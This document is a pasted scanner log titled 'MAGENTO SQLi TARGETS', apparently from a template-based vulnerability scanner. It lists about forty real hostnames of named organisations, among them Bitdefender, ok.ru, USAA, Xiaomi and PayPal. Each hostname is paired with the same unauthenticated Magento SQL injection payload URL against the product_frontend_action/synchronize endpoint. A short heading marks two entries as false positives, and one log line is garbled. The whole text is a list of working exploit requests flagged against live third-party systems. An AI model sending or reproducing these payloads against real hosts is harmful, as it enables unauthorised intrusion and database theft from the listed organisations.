MAGENTO SQLi TARGETS

# MAGENTO SQLi TARGETS ### Test false positives A) https://a004bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- B) https://a004bucgts.kdn.bitdefender.net/catalog2/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- ### TARGETS [INF] Waiting for your terminal to settle.. [INF] [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] Loaded template MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI (@Tink2hack & nathanxa) [Critical] [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a004bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a005bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a002bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a002nviamz.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a003bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a020bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a021bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://staging-wopi.files.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://angry.flocktory.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [1 template, 122032 AGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://mock.lob.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://hybrid.miui.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://cc.sys.miui.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-pc2.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-dc2.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-kc1.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-pc1.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-dc1.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-kc2.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://api-messages-ws.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-ws.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tgproxy2.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://adjvendor.paypal.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://testproxy.tamtam.chat/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://ws.tamtam.chat/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://testproxy2.tamtam.chat/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://san.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://reviews.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://answers.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://aklogsqa.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://markets.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://at.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extlgs.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.c3.miui-l7-miuiauto.tflctwn2t6.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.c3.miui-l7-feedback.1irknwwveg.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.c3.miui-l7-miuiauto.0bdzkgvi8u.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://hybrid.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.c4.miui-l7-miuiauto.bcmmezkwb9.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://activity.hybrid.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.ap-southeast-1.miui-l7-bsp-jupiter.uvcsoawjky.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.c4.miui-l7-bsp-jupiter.ulwpesb1sj.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20-